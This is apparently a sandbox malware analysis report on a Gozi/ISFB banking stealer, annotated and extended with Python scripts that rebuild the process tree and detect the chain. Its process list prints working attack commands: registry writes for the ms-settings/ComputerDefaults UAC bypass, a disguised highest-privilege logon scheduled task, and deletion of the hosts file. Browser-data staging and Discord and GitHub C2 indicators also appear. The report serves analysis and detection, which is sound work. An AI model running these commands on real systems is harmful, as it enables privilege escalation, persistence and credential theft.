Malware Analysis Report

2025-01-22 18:50

Sample ID 240310-q3v1fsdg85
Target mapper.exe
SHA256 27ac4656ed2ddbae711ea1fc0a4ec7277c65015166997304bf9ff53622f69fc5
Tags
gozi banker isfb spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

27ac4656ed2ddbae711ea1fc0a4ec7277c65015166997304bf9ff53622f69fc5

Threat Level: Known bad

The file mapper.exe was found to be: Known bad.

Malicious Activity Summary

gozi banker isfb spyware stealer trojan

Gozi

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Modifies registry class

Suspicious use of UnmapMainImage

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-10 13:47

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-10 13:47

Reported

2024-03-10 13:50

Platform

win11-20240221-en

Max time kernel

157s

Max time network

160s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi

banker trojan gozi

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A

The dropped DLL is C:\Users\Admin\AppData\Local\Temp\Costura\40BD99E3E2E3C109881E4ECA2DEDC617\32\sqlite.interop.dll (Files section below). %TEMP%\Costura\<hash>\<32|64>\ is where Costura.Fody unpacks native libraries embedded in a .NET assembly, so mapper.exe is a .NET executable that ships its own SQLite, the format browsers use for their cookie, login and history stores.

Reads user/profile data of web browsers

spyware stealer

No rows are attached to this signature; the supporting artifacts are in the Files section below. C:\Users\Admin\AppData\Roaming\Gongle\aTRGSC3JE0\zs0352kg.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite follows the Firefox profile layout (a <random>.default-release directory with IndexedDB under storage\permanent), and the MANIFEST-000001, CURRENT, LOG and LOG.old files under the other Gongle\ subdirectories are LevelDB files, the store Chromium-based browsers use for Local Storage, IndexedDB and extension data. Both appearing under a Roaming\Gongle\ directory that belongs to no real browser is consistent with browser storage being copied out to a staging location.

Legitimate hosting services abused for malware hosting/C2

Count Description Indicator Process Target
2 N/A raw.githubusercontent.com N/A N/A
3 N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.amazonaws.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

The full command line is in the process list below: the task is named PlexMediaServerUpdater_s2W0sHpVD4n4EWH1i050MX to pass as a media-server updater, fires at every logon (/SC ONLOGON), requests the highest run level (/RL HIGHEST) and points at C:\Users\Admin\AppData\Local\Microsoft\Credentials\s2W0sHpVD4n4EWH1i050MX.exe, a user-writable path dressed up as a Microsoft directory (ATT&CK T1053.005). schtasks.exe is started from the mapper.exe > cmd.exe chain (PIDs 1440 > 1140 > 3332 in the WriteProcessMemory table), not from the UAC-bypass chain, and the report neither records whether task creation succeeded nor lists a file at that path in the Files section.

Modifies registry class

HKCU\Software\Classes\ms-settings\shell\open\command is the per-user handler for the ms-settings: protocol. The reg.exe invocations below set its default value to "wscript.exe C:\Users\Admin\AppData\Local\Temp\playistanbul8910.vbs" and add a DelegateExecute value, and the process list then launches ComputerDefaults.exe, an auto-elevating Microsoft binary that opens ms-settings:. For a member of the Administrators group at default UAC settings the handler command runs with the elevated token and no consent prompt: this is the ComputerDefaults/fodhelper UAC bypass (ATT&CK T1548.002), the same technique as the better-known fodhelper.exe variant. The WriteProcessMemory table below shows the handler fired here: ComputerDefaults.exe (PID 2880) is the writer into wscript.exe (PID 1204), the position a parent occupies when it starts a child.
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\ms-settings\shell\open\command C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\ms-settings\shell\open\command C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\ms-settings C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\ms-settings\shell C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\ms-settings\shell\open C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\ms-settings\shell\open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\playistanbul8910.vbs" C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Count Description Indicator Process Target
3 N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
2 N/A N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe N/A
59 N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Count Description Indicator Process Target
1 Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A
1 Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe N/A
3 Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
3 Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SendNotifyMessage

Count Description Indicator Process Target
7 N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

The writers chain back to mapper.exe (PID 1440): mapper.exe to reg.exe (twice), to cmd.exe and on to ComputerDefaults.exe and wscript.exe, to a second cmd.exe and on to schtasks.exe, and to uexylubw.exe. The one target that is not a freshly started command is Explorer.EXE (PID 3288), the shell process that heads the process list below: uexylubw.exe is started with the argument explorer.exe and then writes into it 13 times, which is process injection (ATT&CK T1055). The Explorer.EXE entries in the other signatures (GetForegroundWindowSpam, FindShellTrayWindow, SendNotifyMessage, UnmapMainImage and the SeShutdownPrivilege/SeCreatePagefilePrivilege token adjustments) are consistent with injected code running inside the shell.

Count Description Indicator Process Target
3 PID 1440 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe C:\Windows\SysWOW64\reg.exe
3 PID 1440 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe C:\Windows\SysWOW64\reg.exe
3 PID 1440 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe C:\Windows\SysWOW64\cmd.exe
3 PID 332 wrote to memory of 2880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ComputerDefaults.exe
3 PID 2880 wrote to memory of 1204 N/A C:\Windows\SysWOW64\ComputerDefaults.exe C:\Windows\SysWOW64\wscript.exe
3 PID 1440 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe C:\Windows\SysWOW64\cmd.exe
3 PID 1140 wrote to memory of 3332 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
3 PID 1204 wrote to memory of 416 N/A C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\cmd.exe
2 PID 1440 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\mapper.exe C:\Users\Admin\AppData\Local\Temp\uexylubw.exe
13 PID 4936 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Local\Temp\uexylubw.exe C:\Windows\Explorer.EXE
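
The rows above read more easily as a tree. The script below is an added example, not part of the sandbox report: it parses rows in the report's "PID X wrote to memory of Y N/A <writer image> <target image>" format (the rows are reproduced inline from the table above, repeat counts included; the parser relies on the sandbox paths containing no spaces, which holds for this report), rebuilds the writer-to-target tree, and flags targets that receive far more writes than a freshly started child does. The threshold of three writes per child start is an assumption taken from this report's own rows, not a sandbox rule.

```python
"""Rebuild the process tree from 'Suspicious use of WriteProcessMemory' rows.
Added example, not part of the sandbox report."""
import re
from collections import Counter, defaultdict

# Constructed input: the report's rows, reproduced in order with their repeat counts.
T = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"
S = "C:\\Windows\\SysWOW64\\"
REPORT_ROWS = (
    [f"PID 1440 wrote to memory of 1196 N/A {T}mapper.exe {S}reg.exe"] * 3
    + [f"PID 1440 wrote to memory of 4632 N/A {T}mapper.exe {S}reg.exe"] * 3
    + [f"PID 1440 wrote to memory of 332 N/A {T}mapper.exe {S}cmd.exe"] * 3
    + [f"PID 332 wrote to memory of 2880 N/A {S}cmd.exe {S}ComputerDefaults.exe"] * 3
    + [f"PID 2880 wrote to memory of 1204 N/A {S}ComputerDefaults.exe {S}wscript.exe"] * 3
    + [f"PID 1440 wrote to memory of 1140 N/A {T}mapper.exe {S}cmd.exe"] * 3
    + [f"PID 1140 wrote to memory of 3332 N/A {S}cmd.exe {S}schtasks.exe"] * 3
    + [f"PID 1204 wrote to memory of 416 N/A {S}wscript.exe {S}cmd.exe"] * 3
    + [f"PID 1440 wrote to memory of 4936 N/A {T}mapper.exe {T}uexylubw.exe"] * 2
    + [f"PID 4936 wrote to memory of 3288 N/A {T}uexylubw.exe C:\\Windows\\Explorer.EXE"] * 13
)

# Row format: "PID <writer> wrote to memory of <target> <indicator> <writer image> <target image>".
# Assumes the image paths contain no spaces (true for this sandbox's paths).
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) \S+ (\S+) (\S+)$")


def parse_rows(rows):
    """Return (edges, names): edges counts (writer, target) pairs, names maps PID to image."""
    edges, names = Counter(), {}
    for row in rows:
        m = ROW_RE.match(row)
        if not m:
            raise ValueError(f"unrecognised row: {row!r}")
        src, dst, src_img, dst_img = int(m[1]), int(m[2]), m[3], m[4]
        edges[(src, dst)] += 1
        names.setdefault(src, src_img)
        names.setdefault(dst, dst_img)
    return edges, names


def roots(edges):
    """PIDs that write but are never written to: the head of each chain."""
    writers = {s for s, _ in edges}
    targets = {d for _, d in edges}
    return sorted(writers - targets)


def chain_to(edges, pid):
    """PIDs from the root down to pid (every target in this report has a single writer)."""
    parent = {dst: src for src, dst in edges}
    path = [pid]
    while path[-1] in parent:
        path.append(parent[path[-1]])
    return path[::-1]


def render(edges, names):
    """Indented tree, one line per process, with the write count from its writer."""
    children = defaultdict(list)
    for (src, dst), n in edges.items():
        children[src].append((dst, n))
    lines = []

    def walk(pid, depth, n):
        tag = f"   <- {n} write(s) from parent" if n else ""
        lines.append("  " * depth + f"{pid} {names[pid]}{tag}")
        for child, count in sorted(children[pid]):
            walk(child, depth + 1, count)

    for r in roots(edges):
        walk(r, 0, 0)
    return "\n".join(lines)


def flag_injection(edges, typical=3):
    """Assumption (not a sandbox rule): starting a child accounts for only a few writes,
    so a long run of writes into one target is code being placed in a running process."""
    return sorted((src, dst, n) for (src, dst), n in edges.items() if n > typical)


if __name__ == "__main__":
    edges, names = parse_rows(REPORT_ROWS)
    print(render(edges, names))
    for src, dst, n in flag_injection(edges):
        print(f"injection candidate: {names[src]} ({src}) -> {names[dst]} ({dst}), {n} writes")
```

Run it and the single flagged edge is uexylubw.exe (4936) into Explorer.EXE (3288); every other target sits at three writes or fewer, which is what the chain of reg.exe, cmd.exe, ComputerDefaults.exe, wscript.exe and schtasks.exe starts looks like in this table.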

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\mapper.exe

"C:\Users\Admin\AppData\Local\Temp\mapper.exe"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\playistanbul8910.vbs" /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C computerdefaults.exe

C:\Windows\SysWOW64\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\SysWOW64\wscript.exe

"wscript.exe" C:\Users\Admin\AppData\Local\Temp\playistanbul8910.vbs

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN PlexMediaServerUpdater_s2W0sHpVD4n4EWH1i050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Credentials\s2W0sHpVD4n4EWH1i050MX.exe" /RL HIGHEST /IT

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC ONLOGON /TN PlexMediaServerUpdater_s2W0sHpVD4n4EWH1i050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Credentials\s2W0sHpVD4n4EWH1i050MX.exe" /RL HIGHEST /IT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts

C:\Users\Admin\AppData\Local\Temp\uexylubw.exe

"C:\Users\Admin\AppData\Local\Temp\uexylubw.exe" explorer.exe
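
The command lines above turned into detection logic, as an added example that is not part of the report or of any vendor's rule set. The events are constructed from the process list above, in the order the report gives them; the rule names and the ordering heuristic (a reg.exe write to the ms-settings handler appearing earlier in the same event stream than the launch of an auto-elevating binary that opens ms-settings:) are mine. The hosts-file deletion has no signature in the report, so the last rule covers it.

```python
"""Command-line rules for the chain shown in the process list above.
Added example; the events are constructed from the report's own command lines."""
import re

# Constructed input: (image path, command line) pairs in the order the report lists them.
EVENTS = [
    (r"C:\Users\Admin\AppData\Local\Temp\mapper.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\mapper.exe"'),
    (r"C:\Windows\SysWOW64\reg.exe",
     r'"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" '
     r'/d "wscript.exe C:\Users\Admin\AppData\Local\Temp\playistanbul8910.vbs" /f'),
    (r"C:\Windows\SysWOW64\reg.exe",
     r'"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" '
     r'/v DelegateExecute /d "0" /f'),
    (r"C:\Windows\SysWOW64\cmd.exe", r'"cmd.exe" /C computerdefaults.exe'),
    (r"C:\Windows\SysWOW64\ComputerDefaults.exe", r"computerdefaults.exe"),
    (r"C:\Windows\SysWOW64\wscript.exe",
     r'"wscript.exe" C:\Users\Admin\AppData\Local\Temp\playistanbul8910.vbs'),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON '
     r'/TN PlexMediaServerUpdater_s2W0sHpVD4n4EWH1i050MX '
     r'/TR "C:\Users\Admin\AppData\Local\Microsoft\Credentials\s2W0sHpVD4n4EWH1i050MX.exe" /RL HIGHEST /IT'),
    (r"C:\Windows\SysWOW64\schtasks.exe",
     r'schtasks /Create /SC ONLOGON /TN PlexMediaServerUpdater_s2W0sHpVD4n4EWH1i050MX '
     r'/TR "C:\Users\Admin\AppData\Local\Microsoft\Credentials\s2W0sHpVD4n4EWH1i050MX.exe" /RL HIGHEST /IT'),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts'),
    (r"C:\Users\Admin\AppData\Local\Temp\uexylubw.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\uexylubw.exe" explorer.exe'),
]

# Per-user ms-settings: protocol handler, the key the UAC bypass hijacks.
MS_SETTINGS_HANDLER = re.compile(
    r"(HKCU|HKEY_CURRENT_USER)\\Software\\Classes\\ms-settings\\shell\\open\\command", re.I)
# Auto-elevating Microsoft binaries that open ms-settings: and so fire that handler.
MS_SETTINGS_AUTO_ELEVATE = {"fodhelper.exe", "computerdefaults.exe"}
USER_PROFILE_PATH = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.I)
SCRIPT_FROM_TEMP = re.compile(r'\\Temp\\[^\s"]+\.(vbs|vbe|js|jse|wsf)\b', re.I)
HOSTS_REMOVAL = re.compile(r"\b(del|erase|remove-item|rm)\b.*\\drivers\\etc\\hosts\b", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, event index) pairs; events are (image, cmdline) in execution order."""
    findings = []
    handler_written_at = None  # index of the first ms-settings handler write seen
    for i, (image, cmdline) in enumerate(events):
        exe = basename(image)
        if exe == "reg.exe" and MS_SETTINGS_HANDLER.search(cmdline):
            findings.append(("ms-settings handler written under HKCU", i))
            if handler_written_at is None:
                handler_written_at = i
        elif exe in MS_SETTINGS_AUTO_ELEVATE and handler_written_at is not None:
            # Ordering heuristic (assumption): the launcher only matters after the hijack.
            findings.append(("UAC bypass: ms-settings auto-elevator after handler hijack", i))
        elif (exe == "schtasks.exe" and re.search(r"/create\b", cmdline, re.I)
              and re.search(r"/rl\s+highest\b", cmdline, re.I)
              and USER_PROFILE_PATH.search(cmdline)):
            findings.append(("highest-run-level task pointing into user profile", i))
        elif exe in {"wscript.exe", "cscript.exe"} and SCRIPT_FROM_TEMP.search(cmdline):
            findings.append(("script host running script from Temp", i))
        elif HOSTS_REMOVAL.search(cmdline):
            findings.append(("hosts file removed", i))
    return findings


def rules_fired(events):
    """Distinct rule names that matched, for a quick triage summary."""
    return sorted({rule for rule, _ in detect(events)})


if __name__ == "__main__":
    for rule, i in detect(EVENTS):
        print(f"[{i}] {rule}: {EVENTS[i][1]}")
```

Fed the report's ten command lines, the rules fire on both reg.exe writes, on ComputerDefaults.exe, on wscript.exe, on schtasks.exe and on the hosts deletion, and stay silent on mapper.exe and uexylubw.exe themselves, whose command lines carry nothing to match. The same functions take (image, command line) pairs from Sysmon event ID 1 or Windows event 4688 unchanged; the ordering rule assumes the stream is sorted by time.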

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 172.67.146.76:443 textpubshiers.top tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 checkip.amazonaws.com udp
IE 52.211.130.173:80 checkip.amazonaws.com tcp
US 172.67.146.76:443 textpubshiers.top tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/1440-0-0x0000000000B20000-0x0000000000B2A000-memory.dmp

memory/1440-1-0x0000000074FA0000-0x0000000075751000-memory.dmp

memory/1440-2-0x00000000051D0000-0x00000000051EA000-memory.dmp

memory/1440-3-0x00000000052C0000-0x00000000052D0000-memory.dmp

memory/1440-4-0x00000000051B0000-0x00000000051BA000-memory.dmp

memory/1440-5-0x00000000052D0000-0x0000000005362000-memory.dmp

memory/1440-6-0x0000000005920000-0x0000000005EC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\playistanbul8910.vbs

MD5 a34267102c21aff46aecc85598924544
SHA1 77268af47c6a4b9c6be7f7487b2c9b233d49d435
SHA256 eba7ab5c248e46dbe70470b41ebf25a378b4eff9ce632adff927ac1f95583d44
SHA512 5d320312b93b46c9051a20c82d6405a3f2c78b23adb3ab3e71aad854b65b500937de7ca2986cf79967386d689beecccf676d89afde8ecc5d5ad0cb4ae2bf38a3

memory/1440-10-0x000000000AF80000-0x000000000BB80000-memory.dmp

memory/1440-11-0x0000000013110000-0x0000000013DB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Costura\40BD99E3E2E3C109881E4ECA2DEDC617\32\sqlite.interop.dll

MD5 6f2fdecc48e7d72ca1eb7f17a97e59ad
SHA1 fcbc8c4403e5c8194ee69158d7e70ee7dbd4c056
SHA256 70e48ef5c14766f3601c97451b47859fddcbe7f237e1c5200cea8e7a7609d809
SHA512 fea98a3d6fff1497551dc6583dd92798dcac764070a350fd381e856105a6411c94effd4b189b7a32608ff610422b8dbd6d93393c5da99ee66d4569d45191dc8b

memory/1440-17-0x0000000074FA0000-0x0000000075751000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\uexylubw.exe

MD5 e898826598a138f86f2aa80c0830707a
SHA1 1e912a5671f7786cc077f83146a0484e5a78729c
SHA256 df443ccf551470b3f9f7d92faf51b3b85ae206dd08da3b6390ce9a6039b7253a
SHA512 6827068b8580822ded1fb8447bdb038d0e00633f5ef7f480a8cdeaab6928ac23022a0b7a925058e0926ce9b41a6c8c22a5692e074621b2fccdb7edd29a0d4cfb

memory/3288-27-0x0000000000FC0000-0x0000000000FC8000-memory.dmp

memory/3288-28-0x0000000001000000-0x0000000001001000-memory.dmp

memory/3288-29-0x0000000000FC0000-0x0000000000FC8000-memory.dmp

memory/3288-31-0x0000000000FC0000-0x0000000000FC8000-memory.dmp

memory/1440-32-0x00000000052C0000-0x00000000052D0000-memory.dmp

memory/1440-33-0x0000000007BE0000-0x0000000007BF2000-memory.dmp

memory/3288-34-0x0000000000FC0000-0x0000000000FC8000-memory.dmp

memory/1440-40-0x0000000008D20000-0x0000000008D86000-memory.dmp

memory/1440-41-0x0000000007C70000-0x0000000007C7A000-memory.dmp

memory/1440-42-0x0000000009780000-0x000000000978A000-memory.dmp

memory/1440-43-0x00000000052C0000-0x00000000052D0000-memory.dmp

memory/1440-44-0x000000000A010000-0x000000000A01C000-memory.dmp

memory/1440-45-0x000000000A030000-0x000000000A038000-memory.dmp

C:\Users\Admin\AppData\Roaming\Gongle\aTRGSC3JE0\zs0352kg.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite

MD5 fff5eb5a53db55c85c85fc41d144815d
SHA1 09b5e0186222149a0ef108ffbebdb2e111634170
SHA256 71bf91d50e222b6caa468c6460f283782fc0fe1fdbce2c5b792537d9ac6e30df
SHA512 41c9a5247b44928587eda20dd1a5586d94fd7f9fb757317370328d34077a08fa0196380bcf41bbc028f48e0c7b6083d9f1c7baf86859684c0167cb8ac11d1e1b

C:\Users\Admin\AppData\Roaming\Gongle\aHFIW1F86E\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Roaming\Gongle\aHFIW1F86E\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Roaming\Gongle\aHFIW1F86E\LOG

MD5 29959ce422bfb88f442554b41a7709ac
SHA1 379ad8c6c2a7f26dd6e2522868e06a1b2c1eface
SHA256 54d337d50fbfa42a02e59d9fefd9ccb05a314dbce6b35ade1331323e306c46ba
SHA512 b3711f90b358d06282870d1ad4c7d4abb38f2495fd6d365cc2e2bae31b3665b2067aaeefe8dd2eb339284600bd640dd5cfd46d13e14458936c9b5ba61a342861

C:\Users\Admin\AppData\Roaming\Gongle\aHFIW1F86E\LOG.old

MD5 73754ce7719bcede3b39c4823f75cd34
SHA1 385a014c795ea7a7f40390e9b88202832eaf41de
SHA256 7311aa34aeff9e8f9167e311742047b3d597d178327db7f5f31f8d2e73a7b8b3
SHA512 bccc1c596d3518416c66ba0401bc9b0439dd4bfcc7a128caa46b7e23f410ec31ae3d9c665615ffa38e1eb0e86ff676c80d8f26fce8672e8e204066dcac457d4d

C:\Users\Admin\AppData\Roaming\Gongle\a1YO5KAVIZ\LOG

MD5 49c9eeda4f0cb5719057b7f0d5c66897
SHA1 2737971dfe881483dc9aedaa3a5f95a1e3d92a72
SHA256 d8afbacc8e5a6978a15f73c90d5f69460a9a292c560c90cb4f8828c90bf01beb
SHA512 a72ce1e0afa087d25e8feb0dcad2a60c361ff07e1849cc998a76b2c7142cd78f3880320f51ff843304da89711b07092dabce723cffe02de0faa8418628da1752

C:\Users\Admin\AppData\Roaming\Gongle\a1YO5KAVIZ\LOG.old

MD5 dbb1ce7f0195c099b9354b75faea84d8
SHA1 6613f39a9ca1e51402a63362940dcd504a12e33d
SHA256 4cb7f61eccf9831bfb3ad88bcc106b78589a4bb88554abcd47faeab20d897771
SHA512 0e9a2de7bcda8c35f66ff10c2966e2eb800eedc5b79732bd3b6fac5a0061eacf75879b82b36ab95377cfc226d0e453476928de5420dddab6ac98765f11fb2077

memory/1440-173-0x0000000006A00000-0x0000000006AB2000-memory.dmp

memory/1440-174-0x0000000006B10000-0x0000000006B32000-memory.dmp

memory/1440-175-0x000000000A0C0000-0x000000000A136000-memory.dmp

memory/1440-176-0x000000000A060000-0x000000000A07E000-memory.dmp

memory/1440-177-0x000000000A1E0000-0x000000000A230000-memory.dmp

memory/1440-178-0x000000000A230000-0x000000000A29A000-memory.dmp

memory/1440-179-0x000000000CB80000-0x000000000CED7000-memory.dmp

memory/1440-180-0x000000000A190000-0x000000000A1DC000-memory.dmp

memory/1440-185-0x0000000000F30000-0x0000000000F51000-memory.dmp

memory/1440-184-0x0000000001020000-0x000000000105C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\377bbc2f4ebc48449ef15e76af6ed62e

MD5 cbc22106cb58d19e60802ae62409431e
SHA1 dedaeecbffba3a0e7778c27be9b93cf4bd0911f4
SHA256 50eb464af9b22b753718e55c09fe92dc59b034c65f97a0d4c49a902eaaeb981f
SHA512 7e017579b2e697f3a95536a2a3f26f4413a600bad3a61feb9ce8a619f7892c30e7efcaf085c1fbd5f5bc70f024bb945cbc35345d188edf6786f70bbeb007f58e

C:\Users\Admin\AppData\Local\Temp\9d825a42c2814b8d8883e5c3e62cefb0

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

memory/1440-200-0x0000000001080000-0x000000000108A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\de77c69f2032457cafe52bb7a5364409

MD5 3f3e4c7565f42d3e6342ee3cc7d10676
SHA1 f4bc0666699229458509799f42e140ae824572a8
SHA256 94eedc0985692704d2358ace9e5f1f875ab9ad1e013a8cfa02cbef3106ea8f74
SHA512 9181df1ed6e29387c99a868abe47c7e277c2f0a62e91b1ee6f52c19304d1d79e155472a25281785b83e385e64cb9de88c850cec57293ef03d4f6ad2e79b85148

memory/1440-204-0x00000000052C0000-0x00000000052D0000-memory.dmp